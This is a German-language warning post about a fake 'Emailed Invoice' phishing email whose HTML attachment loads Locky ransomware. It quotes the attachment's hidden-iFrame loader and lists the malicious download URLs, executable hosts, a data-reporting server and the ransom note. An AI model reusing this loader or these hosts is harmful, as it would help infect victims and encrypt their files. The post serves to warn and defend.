Locky Ransomware wird verteilt über Emailed Invoice mit HTML-Datei als Anlage
Am Freitag, den 08. September 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail versendet. Öffnen Sie nicht das beigefügte HTML-Dokument! Es wird ein JavaScript geladen, welches die Ransomware „Locky“ (Verschlüsselungs- und Epressungstrojaner) nachlädt und alle Ihre Dateien in *.lukitus umbenennt / verschlüsselt!
Betreff: Emailed Invoice – 703718
Absender: Arlene@Deine DomainAs requested
regards
Arlene Warriner
—
Arlene Warriner
Achtung: Es handelt sich um eine betrügerische E-Mail! Öffnen Sie nicht das HTML-Dokument!
Die E-Mail kommt mit unterschiedlichen Absendernamen. Das beigefügte HTML-Dokument hat ebenfalls unterschiedliche Namen:
I_201330.html
I_549620.html
I_568157.html
I_703718.html
I_910733.html
I_912025.html
I_961597.html
Öffnen Sie nicht die HTML-Datei! Sie enthält u. a. einen iFrame, der eine Datei nachladen würde! Hier zunächst der Quellcode der Datei:
<div style=“background:#eee;border:1px solid #ccc;padding:5px 10px;“>Your file is downloading. Please wait…</div>
<iframe src=“http://visa-sport.ru/w/wb73.php“ style=“display: none;“>
</iframe>
Und so würde es im Browser aussehen:
Your file is downloading. Please wait…
Der iFrame würde zunächst auf unterschiedliche URLs verweisen:
- admin.pkpsv.ru/w/azn4.php
- biohazard.net-live.ru/w/l740.php
- renych.net-live.ru/w/i0pj.php
- secure.tor4.biz/w/d8wx.php
- shtamp.rbs62.ru/w/2pti.php
- visa-sport.ru/w/wb73.php
Diese Adressen würden aber nochmals einen iFrame ausgeben:
<iframe width=“100%“ height=“100%“ src=“http://righparningusetal.net/load.php“></iframe>\r\n
Von righparningusetal.net/load.php würde dann ein JavaScript geladen:
Invoice_I-16507.js
Invoice_I-507312.js
Invoice_I-940572.js
Invoice_I-9217364.js
Invoice_I-41287695.js
Öffnen Sie nicht die HTML-Datei, die der E-Mail beigefügt ist! Führen Sie nicht das nachgeladene JavaScript aus! Das Script lädt von unterschiedlichen Domains eine Datei:
- atargoryled.net/af/utexcgjhgf.exe
- long-an.com.tw/lysvtte.exe
Virustotal zeigt für eine Erkennungsrate von 21/65! Es handelt sich dabei um den Verschlüsselungs- und Erpressungstrojaner „Locky“ (Ransomware). Dieser beginnt u. U. noch nicht sofort mit der Verschlüsselung der Dateien, daher fällt die Infektion u. U. erst später auf.
Der Trojaner sendet an die Domain babmitontwronsed.info/eroorrrs auch verschiedene Systemergebnisse, u. a. auch eine Liste aller unter Windows laufenden Prozesse.
Die aktuelle „Locky“-Version benennt alle Dateien in *.lukitus um:
Daneben produziert „Locky“ zwei Dateien, die auf die Verschlüsselung hinweisen:
lukitus.bmp
lukitus.htm
Nach Ende der Verschlüsselung werden beide Dateien automatisch geöffnet:
.$-=
.|=$$-$!!! WICHTIGE INFORMATIONEN !!!!
Alle Dateien wurden mit RSA-2048 und AES-128 Ziffern verschlüsselt.
Mehr Informationen über RSA können Sie hier finden:
http://de.wikipedia.org/wiki/RSA-Kryptosystem
http://de.wikipedia.org/wiki/Advanced_Encryption_StandardDie Entschlüsselung Ihrer Dateien ist nur mit einem privaten Schlüsseul und einem Entschlüsselungsprogramm,
welches sich auf unserem Server befindet, möglich.
Um Ihren privaten Schlüssel zu erhalten, folgen Sie einem der folgenden Links:Sollte keine der Adressen verfügbar sein, folgen Sie den folgenden Schritten:
1. Laden Sie einene Tor Browser herunter und installieren diesen: https://www.torproject.org/download/download-easy.html
2. Starten Sie den Browser nach der erfolgreichen Installation und warten auf die Initialisierung.
3. Tippen Sie in die Adresszeile: g46mbrrzpfszonuk.onion/*****
4. Folgend Sie den Anweisungen auf der Seite.!!! Ihre persönliche Identifizierungs-ID lautet: ***** !!!
=*|$|+|-c=…_ |.-+
Außerdem tauscht „Locky“ den Bildschirmhintergrund gegen die lukitus.bmp – Datei aus:
Die verlinkte Internetseite zeigt im TOR-Browser folgende Erpressung:
